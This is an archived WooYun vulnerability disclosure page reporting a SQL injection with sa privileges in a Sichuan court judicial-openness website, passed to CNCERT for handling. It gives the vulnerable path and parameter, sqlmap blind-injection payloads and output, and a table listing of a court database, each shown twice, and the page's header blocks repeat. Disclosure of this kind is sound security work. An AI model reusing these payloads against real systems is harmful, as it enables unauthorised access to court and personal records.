四川法院某网SQL注入漏洞，sa权限 | wooyun-2015-0165321| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165321

漏洞标题：四川法院某网SQL注入漏洞，sa权限

漏洞作者：路人甲

提交时间：2015-12-28 12:06

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-28：细节已通知厂商并且等待厂商处理中
2015-12-31：厂商已经确认，细节仅向厂商公开
2016-01-10：细节向核心白帽子及相关领域专家公开
2016-01-20：细节向普通白帽子公开
2016-01-30：细节向实习白帽子公开
2016-02-12：细节向公众公开

简要描述：

四川省高级人民法院！！！
sa权限，涉及27个数据库。
每个库里有上百个表，里面分别有其他各市区的数据。

详细说明：

注入点：http://**.**.**.**/ShowFunction.aspx?fybm=51

GET parameter 'fybm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Parameter: fybm (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fybm=51' AND 4565=4565 AND 'VhfJ'='VhfJ
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: fybm=51' AND 1249=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'UBNF'='UBNF
---
[20:33:30] [INFO] testing Microsoft SQL Server
[20:33:36] [INFO] confirming Microsoft SQL Server
[20:33:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005

看一个数据库吧
Database: sfgk_all
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.spgk_dsrxx             | 149064  |
| dbo.spgk_ajjbxx            | 92322   |
| dbo.SFGK_AJZ               | 91588   |
| dbo.sfgk_web_cjws          | 7454    |
| dbo.spgk_datafornet        | 5648    |
| dbo.spgk_pmxx              | 3649    |
| dbo.spgk_tsgk              | 513     |
| dbo.web_count              | 419     |
| dbo.SFGK_TSGK              | 399     |
| dbo.spgk_fkpjmx            | 383     |
| dbo.hytkh_hytglmx          | 296     |
| dbo.spgk_code              | 232     |
| dbo.sfgk_web_userlog       | 226     |
| dbo.sfgk_spzl_dq           | 214     |
| dbo.sfgk_spzl_dq_bak       | 214     |
| dbo.spzl_dq                | 213     |
| dbo.sfgk_web_info          | 197     |
| dbo.spgk_sszn1             | 137     |
| dbo.spgk_sszn              | 135     |
| dbo.xtgl_role_popedome     | 123     |
| dbo.spgk_szydata           | 87      |
| dbo.xtgl_user_role         | 86      |
| dbo.spgk_dsrdw             | 83      |
| dbo.queryconnect           | 82      |
| dbo.sfgk_web_info_bak0630  | 79      |
| dbo.configure_info         | 75      |
| dbo.xtgl_role              | 65      |
| dbo.sfgk_web_links         | 64      |
| dbo.zxjk_dsrxx             | 63      |
| dbo.sfgk_web_powerrelation | 62      |
| dbo.temp_ygbg              | 60      |
| dbo.hytkh_hytgl            | 59      |
| dbo.spgk_fkpjhz            | 44      |
| dbo.spgk_tpxw              | 43      |
| dbo.sfgk_web_links1111     | 42      |
| dbo.sfgk_web_linksbak      | 41      |
| dbo.sfgk_web_sxrycj        | 40      |
| dbo.spgk_prejcdata         | 40      |
| dbo.spgk_zhpc              | 32      |
| dbo.zxaj_dcjl              | 29      |
| dbo.zxaj_dcjl_qs           | 29      |
| dbo.sfgk_web_powername     | 27      |
| dbo.publicvariant          | 24      |
| dbo.sfgk_web_userinfo      | 24      |
| dbo.xzx_zxzkjl             | 24      |
| dbo.xzx_zxzkjl_qs          | 24      |
| dbo.imagelist              | 21      |
| dbo.sfgk_web_fyggcj        | 20      |
| dbo.sfgk_web_fyggcjbak     | 20      |
| dbo.spgk_data_cst          | 20      |
| dbo.spgk_prejcdata_cst     | 20      |
| dbo.spgk_tongji            | 20      |
| dbo.zxjk_ajjbxx            | 20      |
| dbo.zxjk_ajjbxx_qs         | 20      |
| dbo.zxaj_wtzx              | 18      |
| dbo.zxaj_wtzx_qs           | 18      |
| dbo.zxjk_qzcs              | 17      |
| dbo.zxjk_qzcs_qs           | 17      |
| dbo.spgk_gzyjfk            | 14      |
| dbo.spgk_preszydata        | 14      |
| dbo.spgk_dept              | 13      |
| dbo.zxjk_bananrizhi        | 13      |
| dbo.sfgk_web_tjsj          | 12      |
| dbo.sfgk_web_tjsjbak       | 12      |
| dbo.zxjk_ccczxx            | 11      |
| dbo.zxjk_ccczxx_qs         | 11      |
| dbo.spgk_flyz              | 10      |
| dbo.zxaj_zxhj              | 10      |
| dbo.zxaj_zxhj_qs           | 10      |
| dbo.xtgl_powername         | 9       |
| dbo.zxaj_zdlxjl            | 8       |
| dbo.zxaj_zdlxjl_qs         | 8       |
| dbo.spgk_keyid             | 6       |
| dbo.spgk_keyid_szy         | 6       |
| dbo.searchfor              | 5       |
| dbo.zxaj_sfsjjl            | 5       |
| dbo.zxaj_sfsjjl_qs         | 5       |
| dbo.zxjk_zxfgxx            | 5       |
| dbo.web_bgtbak             | 4       |
| dbo.xzx_sfcc               | 2       |
| dbo.xzx_sfcc_qs            | 2       |
| dbo.zxaj_awryy             | 2       |
| dbo.zxaj_sfcc              | 2       |
| dbo.zxaj_tdwjf             | 2       |
| dbo.zxaj_tdwjf_qs          | 2       |
| dbo.hytkh_data_ajxt11      | 1       |
| dbo.hytkh_data_yjpj        | 1       |
| dbo.spgk_keyidnew_szy      | 1       |
| dbo.spgk_syscfg            | 1       |
| dbo.xzx_zxyjspb            | 1       |
| dbo.xzx_zxyjspb_qs         | 1       |
| dbo.zxaj_jljl              | 1       |
+----------------------------+---------+

漏洞证明：

GET parameter 'fybm' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 51 HTTP(s) requests:
---
Parameter: fybm (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fybm=51' AND 4565=4565 AND 'VhfJ'='VhfJ
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)
    Payload: fybm=51' AND 1249=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'UBNF'='UBNF
---
[20:33:30] [INFO] testing Microsoft SQL Server
[20:33:36] [INFO] confirming Microsoft SQL Server
[20:33:57] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2005

看一个数据库吧
Database: sfgk_all
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| dbo.spgk_dsrxx             | 149064  |
| dbo.spgk_ajjbxx            | 92322   |
| dbo.SFGK_AJZ               | 91588   |
| dbo.sfgk_web_cjws          | 7454    |
| dbo.spgk_datafornet        | 5648    |
| dbo.spgk_pmxx              | 3649    |
| dbo.spgk_tsgk              | 513     |
| dbo.web_count              | 419     |
| dbo.SFGK_TSGK              | 399     |
| dbo.spgk_fkpjmx            | 383     |
| dbo.hytkh_hytglmx          | 296     |
| dbo.spgk_code              | 232     |
| dbo.sfgk_web_userlog       | 226     |
| dbo.sfgk_spzl_dq           | 214     |
| dbo.sfgk_spzl_dq_bak       | 214     |
| dbo.spzl_dq                | 213     |
| dbo.sfgk_web_info          | 197     |
| dbo.spgk_sszn1             | 137     |
| dbo.spgk_sszn              | 135     |
| dbo.xtgl_role_popedome     | 123     |
| dbo.spgk_szydata           | 87      |
| dbo.xtgl_user_role         | 86      |
| dbo.spgk_dsrdw             | 83      |
| dbo.queryconnect           | 82      |
| dbo.sfgk_web_info_bak0630  | 79      |
| dbo.configure_info         | 75      |
| dbo.xtgl_role              | 65      |
| dbo.sfgk_web_links         | 64      |
| dbo.zxjk_dsrxx             | 63      |
| dbo.sfgk_web_powerrelation | 62      |
| dbo.temp_ygbg              | 60      |
| dbo.hytkh_hytgl            | 59      |
| dbo.spgk_fkpjhz            | 44      |
| dbo.spgk_tpxw              | 43      |
| dbo.sfgk_web_links1111     | 42      |
| dbo.sfgk_web_linksbak      | 41      |
| dbo.sfgk_web_sxrycj        | 40      |
| dbo.spgk_prejcdata         | 40      |
| dbo.spgk_zhpc              | 32      |
| dbo.zxaj_dcjl              | 29      |
| dbo.zxaj_dcjl_qs           | 29      |
| dbo.sfgk_web_powername     | 27      |
| dbo.publicvariant          | 24      |
| dbo.sfgk_web_userinfo      | 24      |
| dbo.xzx_zxzkjl             | 24      |
| dbo.xzx_zxzkjl_qs          | 24      |
| dbo.imagelist              | 21      |
| dbo.sfgk_web_fyggcj        | 20      |
| dbo.sfgk_web_fyggcjbak     | 20      |
| dbo.spgk_data_cst          | 20      |
| dbo.spgk_prejcdata_cst     | 20      |
| dbo.spgk_tongji            | 20      |
| dbo.zxjk_ajjbxx            | 20      |
| dbo.zxjk_ajjbxx_qs         | 20      |
| dbo.zxaj_wtzx              | 18      |
| dbo.zxaj_wtzx_qs           | 18      |
| dbo.zxjk_qzcs              | 17      |
| dbo.zxjk_qzcs_qs           | 17      |
| dbo.spgk_gzyjfk            | 14      |
| dbo.spgk_preszydata        | 14      |
| dbo.spgk_dept              | 13      |
| dbo.zxjk_bananrizhi        | 13      |
| dbo.sfgk_web_tjsj          | 12      |
| dbo.sfgk_web_tjsjbak       | 12      |
| dbo.zxjk_ccczxx            | 11      |
| dbo.zxjk_ccczxx_qs         | 11      |
| dbo.spgk_flyz              | 10      |
| dbo.zxaj_zxhj              | 10      |
| dbo.zxaj_zxhj_qs           | 10      |
| dbo.xtgl_powername         | 9       |
| dbo.zxaj_zdlxjl            | 8       |
| dbo.zxaj_zdlxjl_qs         | 8       |
| dbo.spgk_keyid             | 6       |
| dbo.spgk_keyid_szy         | 6       |
| dbo.searchfor              | 5       |
| dbo.zxaj_sfsjjl            | 5       |
| dbo.zxaj_sfsjjl_qs         | 5       |
| dbo.zxjk_zxfgxx            | 5       |
| dbo.web_bgtbak             | 4       |
| dbo.xzx_sfcc               | 2       |
| dbo.xzx_sfcc_qs            | 2       |
| dbo.zxaj_awryy             | 2       |
| dbo.zxaj_sfcc              | 2       |
| dbo.zxaj_tdwjf             | 2       |
| dbo.zxaj_tdwjf_qs          | 2       |
| dbo.hytkh_data_ajxt11      | 1       |
| dbo.hytkh_data_yjpj        | 1       |
| dbo.spgk_keyidnew_szy      | 1       |
| dbo.spgk_syscfg            | 1       |
| dbo.xzx_zxyjspb            | 1       |
| dbo.xzx_zxyjspb_qs         | 1       |
| dbo.zxaj_jljl              | 1       |
+----------------------------+---------+

修复方案：

未深入。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2015-12-31 19:19

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT下发给四川分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165321

漏洞标题：四川法院某网SQL注入漏洞，sa权限

相关厂商：四川法院司法公开网

漏洞作者：路人甲

提交时间：2015-12-28 12:06

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0165321

漏洞标题：四川法院某网SQL注入漏洞，sa权限

相关厂商：四川法院司法公开网

漏洞作者： 路人甲

提交时间：2015-12-28 12:06

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0165321"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云